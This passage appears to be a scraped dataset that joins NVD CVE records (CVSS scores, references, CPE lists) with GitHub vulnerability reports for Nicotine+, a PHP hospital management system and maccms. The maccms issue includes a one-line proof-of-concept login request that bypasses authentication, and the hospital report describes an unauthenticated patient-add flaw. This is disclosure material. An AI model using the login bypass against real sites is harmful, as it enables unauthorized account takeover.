https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/29/comments
0
2022-02-19T17:39:40Z
2022-02-19T17:39:40Z
https://github.com/CuppaCMS/CuppaCMS/issues/29
1,144,803,337
29
3,353
CVE-2021-45848
2022-03-15T19:15:07.840
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicotine-plus/nicotine-plus/issues/1777" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HWYV53KERFH2EC4XI2IVVQFTV75E5XM6/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicotine-plus/nicotine-plus/issues/1777" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HWYV53KERFH2EC4XI2IVVQFTV75E5XM6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nicotine-plus:nicotine\\+:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D5E9D12-0801-44F6-936A-006EDD68C8CD", "versionEndExcluding": "3.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.3", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "116" ]
116
https://github.com/nicotine-plus/nicotine-plus/issues/1777
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nicotine-plus", "nicotine-plus" ]
Type: <class 'ValueError'> Value: access: embedded null character in path Traceback: File "pynicotine/pynicotine.py", line 385, in network_event File "pynicotine/pynicotine.py", line 1823, in queue_upload File "pynicotine/transfers.py", line 666, in queue_upload File "pynicotine/shares.py", line 646, in file_is_shared
Just crashed on Win 11 insider ring
https://api.github.com/repos/nicotine-plus/nicotine-plus/issues/1777/comments
2
2021-12-22T17:11:07Z
2021-12-22T19:00:39Z
https://github.com/nicotine-plus/nicotine-plus/issues/1777
1,087,024,217
1,777
3,354
CVE-2021-45852
2022-03-16T10:15:08.103
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectworlds:hospital_management_system_in_php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82B97C8D-6AD6-4944-B57B-639B6E56B703", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "670" ]
670
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "projectworldsofficial", "hospital-management-system-in-php" ]
**Version: 1.0** No login is required **Steps to reproduce** 1.Send the data packet as shown,You can see that there is no cookie. ![image](https://user-images.githubusercontent.com/78201553/147246675-3741cee8-7f62-4606-933a-1eb1197dfed8.png) 2.After logging in, I found that the addition was successful ![image](https://user-images.githubusercontent.com/78201553/147247066-9c9b4d30-c596-4185-8d51-7d52e3d47bc4.png) **Source code review** add_patient.php line13 ![image](https://user-images.githubusercontent.com/78201553/147246949-0620ff7d-3064-4bb4-a49e-77ff89421a31.png) Enter the noAccessIfNotLoggedIn function ![image](https://user-images.githubusercontent.com/78201553/147247239-317777b0-d651-49c1-88ee-bd562669444f.png) The problem is that although the redirection is made, exit() is not executed, causeing to continue to execute the code below. ![image](https://user-images.githubusercontent.com/78201553/147247416-712cda0e-4adc-4344-8787-7258fa349cbb.png) Succeeded in adding patient without authorization
Unauthorized adding patient in add_patient.php
https://api.github.com/repos/projectworldsofficial/hospital-management-system-in-php/issues/6/comments
0
2021-12-23T13:36:14Z
2021-12-23T13:36:14Z
https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6
1,087,723,961
6
3,355
CVE-2021-45786
2022-03-16T13:15:08.803
In maccms v10, an attacker can log in through /index.php/user/login in the "col" and "openid" parameters to gain privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/747" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/747" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "E1258FF8-1AB2-4A53-88A6-58685BDFEA73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/magicblack/maccms10/issues/747
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
View the login code, ![image](https://user-images.githubusercontent.com/37065209/141428678-2563585a-59df-402b-96cf-2728e2969d43.png) In addition to logging in through the user name and password, you can also log in through the "col" and "openid" parameters, But these two parameters are completely controllable. That causing any user to login vulnerability poc: ``` POST /index.php/user/login openid=1&col=user_id ``` Local test results: <img width="761" alt="image-20211112113955797" src="https://user-images.githubusercontent.com/37065209/141429257-24b7cd53-5e97-43a4-aa5b-78b00df7225e.png"> <img width="932" alt="image-20211112115100091" src="https://user-images.githubusercontent.com/37065209/141429336-d198bb77-4940-4099-b092-2e09afa116fc.png">
There is an arbitrary user login vulnerability
https://api.github.com/repos/magicblack/maccms10/issues/747/comments
1
2021-11-12T07:46:08Z
2021-11-17T15:54:24Z
https://github.com/magicblack/maccms10/issues/747
1,051,673,479
747
3,356
CVE-2021-45787
2022-03-16T13:15:08.843
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/746" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/746" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:-:*:*:*:*:*:*", "matchCriteriaId": "E320DBFC-98FE-4798-82AD-D4DFF465B591", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.03.15:*:*:*:*:*:*", "matchCriteriaId": "4AE3702A-226E-4D62-9B63-5A1ED9F108AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.03.21:*:*:*:*:*:*", "matchCriteriaId": "2DA900CD-455B-4F43-A725-A745C2E5B6FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.04.02:*:*:*:*:*:*", "matchCriteriaId": "DEB4C888-D3C4-4912-AA0C-1A2C40B52AAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.01:*:*:*:*:*:*", "matchCriteriaId": "0C0E363E-C594-4B46-A257-C3B82962A301", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.02.1005:*:*:*:*:*:*", "matchCriteriaId": "6C130F9C-F1CA-489A-8C92-8942DCB416A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.03.0000:*:*:*:*:*:*", "matchCriteriaId": "FB202BFB-D94A-49B3-B521-A933F6B46B7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.04.1320:*:*:*:*:*:*", "matchCriteriaId": "F0C50536-8B6A-433E-8E3E-748ED5491E89", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.07.1213:*:*:*:*:*:*", "matchCriteriaId": "2129C460-9722-41BB-83BE-B0D281522EB0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.08.2020:*:*:*:*:*:*", "matchCriteriaId": "FD8C16C2-3CB8-4904-813C-BA75FC99A074", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.09.1320:*:*:*:*:*:*", "matchCriteriaId": "6AB184F9-1215-4368-918B-1982A9F0D96D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.11.2300:*:*:*:*:*:*", "matchCriteriaId": "AACD8A6A-1D8C-4F68-B5BF-AE25499541F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.15.1403:*:*:*:*:*:*", "matchCriteriaId": "11594E34-4E42-4113-B18B-A552C63D8092", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.17.1050:*:*:*:*:*:*", "matchCriteriaId": "D4D788AE-99B5-4085-B329-1B9C9B202523", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.22.1338:*:*:*:*:*:*", "matchCriteriaId": "000E7AD5-C873-4DAD-8708-7C63DF1D1D62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.05.30.1007:*:*:*:*:*:*", "matchCriteriaId": "FE8A05AB-3A29-48C6-8786-8705A0832626", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.06.04.1510:*:*:*:*:*:*", "matchCriteriaId": "B0CC1D48-478D-4E30-A601-0F0717207550", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.06.08.1339:*:*:*:*:*:*", "matchCriteriaId": "6135DAF8-24CF-4DB6-B1A9-299F9E730D8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.06.12.1430:*:*:*:*:*:*", "matchCriteriaId": "D0021EE4-3BA0-475A-9CF3-60CCC463E835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.06.15.0910:*:*:*:*:*:*", "matchCriteriaId": "AB4220D7-D563-4F84-AB9A-61536BD5BCE4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.06.29.1425:*:*:*:*:*:*", "matchCriteriaId": "6934E150-9CAF-4D27-9335-9411341A998C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.07.29.1010:*:*:*:*:*:*", "matchCriteriaId": "F9118BB4-676F-455B-B0D2-313FABA1A216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.08.14.0955:*:*:*:*:*:*", "matchCriteriaId": "CC5FC3D7-32FE-47C7-88F5-DB3670F4926D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.08.24.1355:*:*:*:*:*:*", "matchCriteriaId": "34FAF67F-E8CD-4888-ABD9-F52225FE0AF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.08.25.1120:*:*:*:*:*:*", "matchCriteriaId": "285FA281-AF48-4352-9590-494A4AE1CED5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.09.03.0920:*:*:*:*:*:*", "matchCriteriaId": "EB5D1298-F23F-41D8-936E-27D07D060EF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.09.14.0850:*:*:*:*:*:*", "matchCriteriaId": "75A08033-B0A0-472F-A0DB-E7F7B9A4B3EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.09.28.0950:*:*:*:*:*:*", "matchCriteriaId": "8A8E6DF7-A8E9-4C11-867C-FA51B21CB165", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.10.09.1333:*:*:*:*:*:*", "matchCriteriaId": "656AC004-717E-42CE-ADB9-15343FB222A0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.10.13.1025:*:*:*:*:*:*", "matchCriteriaId": "19BD07A2-93FB-49E1-986F-532153D5B534", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.10.22.1200:*:*:*:*:*:*", "matchCriteriaId": "FBA3E59C-F4C2-4EB3-A88C-DABF4D7CE7C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.10.31.1340:*:*:*:*:*:*", "matchCriteriaId": "CFAF3A0E-C1E1-4011-B122-4BB9FF8787A7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.11.18.0920:*:*:*:*:*:*", "matchCriteriaId": "616704AA-2A86-4CE7-A2DB-08B0BB65C59E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.12.05.0950:*:*:*:*:*:*", "matchCriteriaId": "41F798F3-FB23-47D3-AB62-10ED76274785", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2018.12.13.2151:*:*:*:*:*:*", "matchCriteriaId": "4A0125E6-D733-48EA-A084-271EB5463E18", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1001:*:*:*:*:*:*", "matchCriteriaId": "48DF7A2D-1733-4243-AA4C-9CDEF3D2137D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1002:*:*:*:*:*:*", "matchCriteriaId": "7ECAF2A3-1B6D-48C6-916A-0BCA4A234DAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1003:*:*:*:*:*:*", "matchCriteriaId": "522E15A1-F7B4-4262-BBBB-6CCC2B7246C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1004:*:*:*:*:*:*", "matchCriteriaId": "E255546F-4F79-4440-A062-34D2A6DC6890", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1005:*:*:*:*:*:*", "matchCriteriaId": "F60B94E7-52E0-4D72-90E6-FFCFDC2F4250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1006:*:*:*:*:*:*", "matchCriteriaId": "22FD92D7-B668-4432-ABA7-502F700F8CED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1007:*:*:*:*:*:*", "matchCriteriaId": "43C392DC-F351-48C6-A67C-4549F3FD83DB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.00.00.1008:*:*:*:*:*:*", "matchCriteriaId": "4B57A981-1331-4418-A115-BA7457BD39BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.01.19.1001:*:*:*:*:*:*", "matchCriteriaId": "0721E31D-CBA6-4FF7-88CF-FFD1ECA59DDC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.0101.1001:*:*:*:*:*:*", "matchCriteriaId": "1ED349D7-EDFD-4F29-B0A9-EC04CCC35B80", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.02.23.0850:*:*:*:*:*:*", "matchCriteriaId": "93624395-0614-46AF-A991-AF0E52E7540C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.03.06.1617:*:*:*:*:*:*", "matchCriteriaId": "3C2684CB-539F-492D-A6E1-A5BDE4D1C370", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1009:*:*:*:*:*:*", "matchCriteriaId": "C4A420D8-5E24-43F1-A312-B9DADB6C162C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1010:*:*:*:*:*:*", "matchCriteriaId": "16B7CC1C-AE9D-43A9-9797-CABE8AB57F69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1011:*:*:*:*:*:*", "matchCriteriaId": "896BDA29-8A7D-437B-9932-26BDBCCBBB9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1012:*:*:*:*:*:*", "matchCriteriaId": "41BF90C0-294C-4DF5-A45C-5B2A66FD1CA5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1013:*:*:*:*:*:*", "matchCriteriaId": "52473E1D-1F72-4F44-A876-16F0CFA78D6A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1014:*:*:*:*:*:*", "matchCriteriaId": "D0ECA6B9-ED6E-4D89-A064-AF8861A0210B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1015:*:*:*:*:*:*", "matchCriteriaId": "C7AB8A50-A5A6-471A-B528-08CB6A2D2446", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1016:*:*:*:*:*:*", "matchCriteriaId": "D765EE44-79E0-42AF-B73E-B03F91F70054", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1017:*:*:*:*:*:*", "matchCriteriaId": "EECCD73E-307A-4B7F-A01C-58C431656D4C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2019.1000.1018:*:*:*:*:*:*", "matchCriteriaId": "3DC00359-640B-4E51-B32A-7B4E3CBCAD82", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1019:*:*:*:*:*:*", "matchCriteriaId": "E211D825-F11C-4E28-8A40-9340A356D9D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1020:*:*:*:*:*:*", "matchCriteriaId": "FDDAD823-EC56-4770-A367-B5C808AC532C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2020.1000.1021:*:*:*:*:*:*", "matchCriteriaId": "29CC6113-F54D-4DEA-8CDF-326E5597D5A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": 